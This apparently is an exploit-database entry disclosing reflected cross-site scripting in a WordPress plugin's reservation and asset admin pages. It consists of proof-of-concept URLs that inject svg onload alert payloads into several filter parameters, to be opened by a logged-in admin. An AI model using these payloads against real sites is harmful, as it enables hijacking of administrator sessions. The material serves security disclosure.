## https://sploitus.com/exploit?id=WPEX-ID:C346FF80-C16B-4219-8983-708C64FA4A61
Make a logged in admin open
https://example.com/wp-admin/admin.php?page=sr-assets&filter_city_listing="><svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=sr-reservations&filter_customer_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_customer_fullname%2F)>&filter_guest_fullname="><svg%2Fonload%3Dalert(%2FXSS-filter_guest_fullname%2F)>&filter_checkin_from="><svg/onload=alert(/XSS-filter_checkin_from/)>&filter_checkin_to="><svg/onload=alert(/XSS-filter_checkin_to/)>&filter_checkout_from="><svg/onload=alert(/XSS-filter_checkout_from/)>&filter_checkout_to="><svg/onload=alert(/XSS-filter_checkout_to/)>
Other pages & parameters are affected